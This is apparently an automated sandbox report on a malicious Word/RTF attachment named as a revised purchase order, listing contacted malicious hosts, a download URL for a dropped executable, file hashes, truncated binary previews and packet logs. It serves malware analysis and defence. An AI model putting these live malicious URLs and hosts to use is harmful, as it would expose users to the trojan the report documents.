                                              http://www.autoitscript.com/autoit3explorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.mozilla.orgexplorer.exe, 00000007.00000000.934356459.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.1022535877.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.960851031.0000000000335000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.949823009.0000000000335000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://sanbarts.com/cssati.exejEQNEDT32.EXE, 00000002.00000002.914976061.00000000008FF000.00000004.00000020.00020000.00000000.sdmptrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.piriform.com/ccleanervexplorer.exe, 00000007.00000000.1025977451.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.953687008.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.965173113.0000000004385000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.941729011.0000000004385000.00000004.00000001.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://policies.yahoo.com/w3c/p3p.xmlwuapp.exe, 00000008.00000002.1182990879.000000000293F000.00000004.10000000.00040000.00000000.sdmpfalse
                                                      		high
                                                      http://servername/isapibackend.dllexplorer.exe, 00000007.00000000.967364013.0000000006450000.00000002.00000001.00040000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		low

                                                      World Map of Contacted IPs

                                                      • No. of IPs < 25%
                                                      • 25% < No. of IPs < 50%
                                                      • 50% < No. of IPs < 75%
                                                      • 75% < No. of IPs

                                                      Public IPs

                                                      IPDomainCountryFlagASNASN NameMalicious
                                                      194.9.94.86
                                                      		sanbarts.comSweden
                                                      		39570LOOPIASEtrue
                                                      98.137.244.37
                                                      		sbsfe-p8.geo.mf0.yahoodns.netUnited States
                                                      		36647YAHOO-GQ1UStrue
                                                      45.120.185.113
                                                      		215ffbc1941f6023.7host.cnHong Kong
                                                      		138415HENGDA-HKHENGDANETWORKLIMITEDHKtrue

                                                      General Information

                                                      Joe Sandbox Version:34.0.0 Boulder Opal
                                                      Analysis ID:635413
                                                      Start date and time: 27/05/202221:19:142022-05-27 21:19:14 +02:00
                                                      Joe Sandbox Product:CloudBasic
                                                      Overall analysis duration:0h 11m 34s
                                                      Hypervisor based Inspection enabled:false
                                                      Report type:light
                                                      Sample file name:Revised RFQ-PO180911.doc
                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                      Number of analysed new started processes analysed:10
                                                      Number of new started drivers analysed:0
                                                      Number of existing processes analysed:0
                                                      Number of existing drivers analysed:0
                                                      Number of injected processes analysed:1
                                                      Technologies:
                                                      • HCA enabled
                                                      • EGA enabled
                                                      • HDC enabled
                                                      • AMSI enabled
                                                      Analysis Mode:default
                                                      Analysis stop reason:Timeout
                                                      Detection:MAL
                                                      Classification:mal100.troj.expl.evad.winDOC@11/14@5/3
                                                      EGA Information:
                                                      • Successful, ratio: 80%
                                                      HDC Information:
                                                      • Successful, ratio: 37.8% (good quality ratio 35.1%)
                                                      • Quality average: 76.2%
                                                      • Quality standard deviation: 30.3%
                                                      HCA Information:
                                                      • Successful, ratio: 98%
                                                      • Number of executed functions: 0
                                                      • Number of non-executed functions: 0
                                                      Cookbook Comments:
                                                      • Found application associated with file extension: .doc
                                                      • Adjust boot time
                                                      • Enable AMSI
                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                      • Attach to Office via COM
                                                      • Scroll down
                                                      • Close Viewer

                                                      Warnings

                                                      • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                                                      • TCP Packets have been reduced to 100
                                                      • Execution Graph export aborted for target EQNEDT32.EXE, PID 1544 because there are no executed function
                                                      • Not all processes where analyzed, report is missing behavior information
                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                      • Report size getting too big, too many NtQueryValueKey calls found.

                                                      Simulations

                                                      Behavior and APIs

                                                      TimeTypeDescription
                                                      21:20:17API Interceptor120x Sleep call for process: EQNEDT32.EXE modified
                                                      21:20:29API Interceptor24x Sleep call for process: dvukljmnr.exe modified
                                                      21:20:57API Interceptor208x Sleep call for process: wuapp.exe modified
                                                      21:21:40API Interceptor1x Sleep call for process: explorer.exe modified

                                                      Joe Sandbox View / Context

                                                      IPs

                                                      No context

                                                      Domains

                                                      No context

                                                      ASNs

                                                      No context

                                                      JA3 Fingerprints

                                                      No context

                                                      Dropped Files

                                                      No context

                                                      Created / dropped Files

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\cssati[1].exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:downloaded
                                                      Size (bytes):299113
                                                      Entropy (8bit):7.946436383486754
                                                      Encrypted:false
                                                      SSDEEP:6144:B0YmjnZuHB7pD0VRQCReiNfi+UPKI//9d7j9OHv:WtgQnQJiNfipK81dQHv
                                                      MD5:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                      SHA1:268BAFBD996997350D32521A0012602960C5D004
                                                      SHA-256:E17BFB8370C8BADF90756F650E1BE4794E77A57ABB3619C30789364756304759
                                                      SHA-512:B229294931FE70480A7CB0937B33311FA838E5B5F1AC880A1E8FD06B67DDEE6C4B691D9A0D93004BE86DEBA5300FAF55511CD910FAD56F89C4E79B5EEAD6F681
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 9%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                      Reputation:low
                                                      IE Cache URL:http://www.sanbarts.com/cssati.exe
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z...........2.......p....@..........................................................................s.......................................................................................p...............................text....Y.......Z.................. ..`.rdata..z....p.......^..............@..@.data...............p..............@....ndata.......@...........................rsrc................t..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{E6E86BED-0A8E-45B4-8DBF-02AF74FFE8F6}.tmp

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Composite Document File V2 Document, Cannot read section info
                                                      Category:dropped
                                                      Size (bytes):5632
                                                      Entropy (8bit):3.977045300212439
                                                      Encrypted:false
                                                      SSDEEP:48:rvl2t0MPY8hiStDY0EDK4DZSZ3w/tC7DuDd/rSCD:LlxMPXIS9TWU3wQPudf
                                                      MD5:CF5C5EA5A46EFBC81FAB97BC32950071
                                                      SHA1:E9AFF9A0F369B22BE034E728D420742920443916
                                                      SHA-256:67D139F672BFDB09E84F5CFEB3B020C8C17EC70CE5035717ACBD878EA218BA57
                                                      SHA-512:8B8388C1B667AEA9892AF5347B12AEDD72EC4F5EF92FB052252FB0EE17ACB607CE82128C4D979A5D0C576006600DBDBD2B4CE169C2EAA6F7E2BA1FCF34742904
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Avira, Detection: 100%
                                                      Reputation:low
                                                      Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B25940B-6835-4585-8FCF-CB425A08E6FD}.tmp

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.980404169406617
                                                      Encrypted:false
                                                      SSDEEP:3:tlnBknLkylfgREqAWlglqlg7tlVl3llLr1lll8v0lglwZsl8gl7vlI7:RsLhNgREqAWlgFJ7lll8vlw2FrG
                                                      MD5:8738761EA2BF10FB35D99778619F54B5
                                                      SHA1:2C2AAC95B01964FC3883FFE659670A041CFCC132
                                                      SHA-256:943B941CA0D785F23DED5B8CB332830F66D60EFDBB2BB2175E5F34D39E251534
                                                      SHA-512:F8C03355DA8405BF2DA8AA694FA3DFD74267A3403DE239570F5837D6A786CD6ED6E0FDE60CF5DC2F5E2A2EB0B385FEE4D923789C6096A323C9E3E7F67CF40B89
                                                      Malicious:false
                                                      Preview: . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .7.7.1.5.6.4.1.8.0.7.7.1.5.6.4.1.8.0.. =....... .E.q.u.a.t.i.o.n...3.E.M.B.E.D.........................................................................................................................................................................................................................................................................................................................................................................................b...d...f...l.............................................................................................................................................................................................................................................................................................................................................................................................................................................................j....CJ..OJ..QJ..U..^J..aJ

                                                      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{6C29C56C-3D5B-4878-9A01-77B8177CDD57}.tmp

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):1024
                                                      Entropy (8bit):0.05390218305374581
                                                      Encrypted:false
                                                      SSDEEP:3:ol3lYdn:4Wn
                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                      Malicious:false
                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\4qh31ayyhk84s8sjtofn

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):189439
                                                      Entropy (8bit):7.989126055665329
                                                      Encrypted:false
                                                      SSDEEP:3072:HkPmzAMnIFKBvGchRYsnPT5EZ5aRmNGWuSN7s+hYX/EXQEZxdMipBbK91yvrCVA:Hy0ZnWWvtRfPTCZ5OmfYvEXvxdtpTuVA
                                                      MD5:17179B4032C3411541C24CA24C8C9AAE
                                                      SHA1:13F54B0C026B6C7E53AA94DF8F73FA24ECAA0393
                                                      SHA-256:B82CA9A52D0AC42AEB246ED7FA0FD7F95C6248F6684B1AB8E6D973EE934CE0B9
                                                      SHA-512:6127E76EEC4D121BE3EE8A45DA44220A33AC57924255738F80EDAB3B92A7FD7D8F002779FA0F3296F3B795671767853E49DD2642EB43419E373284BFBD8B0201
                                                      Malicious:false
                                                      Preview:...4Q....Ks.SU..=V&.4.....`.vN..Au....oi.k.s%...dH}.U...I$..U-s....M...ugf...7...2\....4.d......S.....h..........8.\..@.*`.B...6h"....c.Ki.....d#....-.H....*...~.c.....906z.......6/.&.?.>[.e_u.w.RO..3#00...d.dhH%"'.I.@...wY.g{C$..=...`....A.MKHQ..&...{i...&.<....z....N..AuK...oW...s%...!H}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....90.Hk.;...f.(/..>?M....._u.w.R..'..;..@p..dhH%"'.I....Y.g.Q$.....Q.`...~.*KHQ...&....{i.kC&.*....z.Z..vN..Au....oi.k.s%...dH}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....906z.......6/..>?MR...e_u.w.R..'..;...p..dhH%"'.I....Y.g.Q$.....Q.`...~.*KHQ...&....{i.kC&.*....z.Z..vN..Au....oi.k.s%...dH}.U..F.I$0...s%.....?.X-W.?.zFkc...../V.C...........YG. ..Xi....8.\..@f9._..r.......!...o..P.....2x...6S .W8.V....c.....906z.......6/..>?MR...e_u.w.R..'..;...p..dhH%"'.I

                                                      C:\Users\user\AppData\Local\Temp\dvukljmnr.exe

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):191488
                                                      Entropy (8bit):6.541898820880567
                                                      Encrypted:false
                                                      SSDEEP:3072:afbnR6BqNvncvhwj8H0o45It38FSDblJpeKdsa9:MpvncWs0o4at3l9
                                                      MD5:9CECB9E88C1FF3D7A4FFC8BFEB27C2E1
                                                      SHA1:63223BA95BFA3BF5C33B2FA08376AFC90B35465E
                                                      SHA-256:78C9548A33ABD68ED553BB2A48166AFD21041B9D868A0373E4A11B93409DB049
                                                      SHA-512:BE4365F78F9DA5D3AB920100DEBF9A23F94101C5482DB6FBB8708913006483DF0A6DC882BAAC4D11EB942B464E548AC4F31A044F13FE6670B68DA1B95A2FDAAE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 69%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........Z..4...4...4......4.....4......4.C.5...4...5...4...0...4......4...6...4.Rich..4.........................PE..L...1.b.................\...................p....@..........................P............@.......................................... .......................0......(...T..............................@............p...............................text....[.......\.................. ..`.rdata..fa...p...b...`..............@..@.data...,1..........................@....rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\nstBFBE.tmp

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):392249
                                                      Entropy (8bit):7.457203020718996
                                                      Encrypted:false
                                                      SSDEEP:6144:QPy0ZnWWvtRfPTCZ5OmfYvEXvxdtpTuVOQz8jpvncWs0o4at3l9:UDZWqno5OmfYvqxd4dz81cWsIab9
                                                      MD5:6D2C377D4EAA999F9049920017F0AEBE
                                                      SHA1:C60DEEBEF6AB6F06B13801186B82B30B7EC07CF9
                                                      SHA-256:92820C32038F81C895428B292EBF5221903830336E08979AD68E54C1060B6DD8
                                                      SHA-512:588C7840DE4D228C65BA594F9837C4C29E5EB16E98FF0CE71584414CA46F396E25E45D447297D42111D743920A601902EC26EF5150501591D5CADF6DC7423956
                                                      Malicious:false
                                                      Preview:L.......,...................Q...........n.......4...........................................................................................................................................................................................................................................B...................j..........................................................................................................................................."...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\AppData\Local\Temp\xxsjdcnfw

                                                      Download File
                                                      Process:C:\Users\user\AppData\Roaming\word.exe
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):4830
                                                      Entropy (8bit):6.200355296128427
                                                      Encrypted:false
                                                      SSDEEP:96:lEgwdw+mcaoVVlbspZr/phpQDrbCGmrTJp4Fd0ZNN7juiOR/:11g/c/pQ3DFqBUR/
                                                      MD5:498C16613E82CEBCA0FC1541214BE952
                                                      SHA1:23E7DA2AA1B3EF5F3AEC1AE51F797DA4F421EFC5
                                                      SHA-256:7F40DA6288C8E939AFEA7A6512E518933D1802F6B822817B21E3B457AF445CE8
                                                      SHA-512:BA6B040C01B60827F893F918DE5478E83B53DA511EF62D0B10B2A12EC17F64C2FF64BD50DC1BE814809153AE90C913370010BACF22636FBD4820B409E6183A7B
                                                      Malicious:false
                                                      Preview:......].U..%..U.........x........U...|....U.t.y..y....(....._.._..y..y....(.b..._.._..y..y....(....._.._..y..y....(.<..._.._..U.......0......o_.x_.d]..U..._.._K.]..]K|...../q.]....|.._.|.._.tUd.......U....|y./y..y..0y../y.x.y..Cr... ].q. _Lt.U...y...]...._....|...........U...].t..]....-.....].''........]..]......]..].]K.].]..._.._.|]..]..]K._.]..].|.....................y................m..J..........].U..................._.|U.....].|...].|._.|].. _..}d. ...C...]..o../..._..._......o../.w._..._.......0.....(..y.......(..{yy_.t}....(y....yyy_.tU.t...U..}........].......].U..................._.|U.....].|...].|._.|].. _..}d.o...C..D^...]..o../..._..._...]..o../.w._..._...]..o../.w_..._...]........._.._L....o../.w._..._.......0.....(.....v...(..|yy_.tU.....]..]K._.}.y..y..y..y..y....zyy_.tU.t...U..}........].......].U.........d_.|U.....].|...].|._.|].. _..}d.6...C...]..o../..._..d_...]..o../.w._..d_.......0.....d(...m......(..|yy_.t}.y..y...1{y

                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Revised RFQ-PO180911.LNK

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:54 2022, mtime=Tue Mar 8 15:45:54 2022, atime=Sat May 28 03:20:14 2022, length=4205, window=hide
                                                      Category:dropped
                                                      Size (bytes):1064
                                                      Entropy (8bit):4.561334084261307
                                                      Encrypted:false
                                                      SSDEEP:12:8J2LpgXg/XAlCPCHaXBKBnB/xQpX+WhsxaibJticvbc2AksJJDtZ3YilMMEpxRlb:8J2T/XTRKJIoxtb2eQ243Dv3qIY7h
                                                      MD5:7A0827D76EE99E21650DB99266382AA1
                                                      SHA1:8D3328AF1607BCBA9B99539719B3C101BD51BE2D
                                                      SHA-256:EEB5D0D80D9AE296DA2B4B4D1BF6AFC4B5CBCACCF2C2948C7D4581971015CE6E
                                                      SHA-512:E5A6713869D093AA09994BA31D61067AE1360950331B8034AF17B0D7767DAA6EB63D5D4CCA1ED2C2AC44E112B110235F192D6E6DE15BF07C592C8EA4DDD70006
                                                      Malicious:false
                                                      Preview:L..................F.... ....<a..3...<a..3.....:Jr..m............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1.....hT....user.8......QK.XhT..*...&=....U...............A.l.b.u.s.....z.1.....hT....Desktop.d......QK.XhT..*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....z.2.m....T." .REVISE~1.DOC..^......hT..hT..*...r.....'...............R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\936905\Users.user\Desktop\Revised RFQ-PO180911.doc./.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.R.e.v.i.s.e.d. .R.F.Q.-.P.O.1.8.0.9.1.1...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......936905..........D_..

                                                      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:ASCII text, with CRLF line terminators
                                                      Category:dropped
                                                      Size (bytes):91
                                                      Entropy (8bit):4.905985646870587
                                                      Encrypted:false
                                                      SSDEEP:3:bDuMJlvDzndVOLprXCmX1mQzndVOLprXCv:bCkHn+dzxn+dzs
                                                      MD5:CEBD1CC56D43DF635440E2ED8B4A5B04
                                                      SHA1:EF8682C6F0816F2C59F2F69BDE5FBF5C13133FCF
                                                      SHA-256:1A97AB0D3F171BB80E32696C0F6125743C6F20AEBA4B3FA4529EDB8277554681
                                                      SHA-512:8DC534B70B012E0E9CEDDAD42D133892FBDA6003F85E14CED563F3BC81169B81AC9A0ABE0D896E48D0A96B2DEC130067F08042EBF0EA63228DF458531E283350
                                                      Malicious:false
                                                      Preview:[folders]..Templates.LNK=0..Revised RFQ-PO180911.LNK=0..[doc]..Revised RFQ-PO180911.LNK=0..

                                                      C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020303
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

                                                      C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:Little-endian UTF-16 Unicode text, with no line terminators
                                                      Category:dropped
                                                      Size (bytes):2
                                                      Entropy (8bit):1.0
                                                      Encrypted:false
                                                      SSDEEP:3:Qn:Qn
                                                      MD5:F3B25701FE362EC84616A93A45CE9998
                                                      SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                      SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                      SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                      Malicious:false
                                                      Preview:..

                                                      C:\Users\user\AppData\Roaming\word.exe

                                                      Download File
                                                      Process:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                      Category:dropped
                                                      Size (bytes):299113
                                                      Entropy (8bit):7.946436383486754
                                                      Encrypted:false
                                                      SSDEEP:6144:B0YmjnZuHB7pD0VRQCReiNfi+UPKI//9d7j9OHv:WtgQnQJiNfipK81dQHv
                                                      MD5:C6E799EEEBA0345DE98B4E9A6AC76B82
                                                      SHA1:268BAFBD996997350D32521A0012602960C5D004
                                                      SHA-256:E17BFB8370C8BADF90756F650E1BE4794E77A57ABB3619C30789364756304759
                                                      SHA-512:B229294931FE70480A7CB0937B33311FA838E5B5F1AC880A1E8FD06B67DDEE6C4B691D9A0D93004BE86DEBA5300FAF55511CD910FAD56F89C4E79B5EEAD6F681
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: Metadefender, Detection: 9%, Browse
                                                      • Antivirus: ReversingLabs, Detection: 62%
                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........qJ...$...$...$./.{...$...%.;.$.".y...$..3....$.f."...$.Rich..$.........................PE..L.....iF.................Z...........2.......p....@..........................................................................s.......................................................................................p...............................text....Y.......Z.................. ..`.rdata..z....p.......^..............@..@.data...............p..............@....ndata.......@...........................rsrc................t..............@..@................................................................................................................................................................................................................................................................................................................................................

                                                      C:\Users\user\Desktop\~$vised RFQ-PO180911.doc

                                                      Download File
                                                      Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      File Type:data
                                                      Category:dropped
                                                      Size (bytes):162
                                                      Entropy (8bit):2.4797606462020303
                                                      Encrypted:false
                                                      SSDEEP:3:vrJlaCkWtVyAI/ugXImW4eedln:vdsCkWtpIGgXvdl
                                                      MD5:1674A1C7C99CD9FAADA789F5E2AEB335
                                                      SHA1:26D9E81D5ED584A899A94D5EA8945A5AE3403F85
                                                      SHA-256:BB5F0D32E0E1C8B6865FCE4AE1FC50E34CA954B89E771364A6BE6627F7C726B6
                                                      SHA-512:B2225E8F93F06FFE32B4FDF987D5134BB06F1B0874509E1CC973FD4D30B0F1341CB1AE72FBE9C282A65794A130E2D9C8D4939B789492BC1BCC96394C5F03E02C
                                                      Malicious:false
                                                      Preview:.user..................................................A.l.b.u.s.............p........12..............22.............@32..............32.....z.......p42.....x...

                                                      Static File Info

                                                      General

                                                      File type:data
                                                      Entropy (8bit):4.757042986275398
                                                      TrID:
                                                      • Rich Text Format (4004/1) 100.00%
                                                      File name:Revised RFQ-PO180911.doc
                                                      File size:4205
                                                      MD5:afaa3f4a9a241593ea30e05773c22980
                                                      SHA1:1d9dabc7f48e7d3c50c3d7d36a371be6bb63746d
                                                      SHA256:25966cc19f04cbbdacdf04249247d606c037cb527669addbfb0d52e0cd948519
                                                      SHA512:dd13ab1647bda04ee24a67f858c477657a7029d25a03f704b5d946930b75886f3f04360b132631d220709ccf4430ce40871033441510fba5923a8355c3f1816b
                                                      SSDEEP:96:rXNv4zQBSRu6lT85c98HwedaKR/UHpTQXbfZauPjspq:r9ALHTqc98Q2fR/UJTQXjAo
                                                      TLSH:7B815D33B65C5EA7D729C5FD424B7D569252F1670FCFA840315CD99003697B08A6C1E1
                                                      File Content Preview:{\rtF3245{\object53103277 \objocx88498732\objw1025\objh9295{\*\objdata913763 {\bin00000000 {\*\objdata913763 } \*\from771564180771564180 HSSnyM9uPxlyjjXd27hWYJB7.59Zdx5NZFDEVBRnWKalWrjLy4Xp790TBCTh1QhPwoRhik6h23}.{\*\ensp

                                                      File Icon

                                                      Icon Hash:e4eea2aaa4b4b4a4

                                                      Network Behavior

                                                      Network Port Distribution

                                                      TCP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      May 27, 2022 21:20:07.545912027 CEST4917380192.168.2.22194.9.94.86
                                                      May 27, 2022 21:20:07.585800886 CEST8049173194.9.94.86192.168.2.22
                                                      May 27, 2022 21:20:07.585885048 CEST4917380192.168.2.22194.9.94.86
                                                      May 27, 2022 21:20:07.586997986 CEST4917380192.168.2.22194.9.94.86
                                                      May 27, 2022 21:20:07.625652075 CEST8049173194.9.94.86192.168.2.22
                                                      May 27, 2022 21:20:07.626665115 CEST8049173194.9.94.86192.168.2.22
                                                      May 27, 2022 21:20:07.626735926 CEST4917380192.168.2.22194.9.94.86
                                                      May 27, 2022 21:20:07.750381947 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.063146114 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.063292980 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.064167976 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.378580093 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378611088 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378627062 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378640890 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378660917 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378679037 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378696918 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378712893 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378729105 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378746986 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.378770113 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.378803968 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.378808022 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.378810883 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.389332056 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.691915035 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.691951036 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.691963911 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.691977024 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.691988945 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.692003012 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.692270994 CEST4917480192.168.2.2245.120.185.113
                                                      May 27, 2022 21:20:08.721050024 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721085072 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721101046 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721113920 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721132040 CEST804917445.120.185.113192.168.2.22
                                                      May 27, 2022 21:20:08.721144915 CEST804917445.120.185.113192.168.2.22
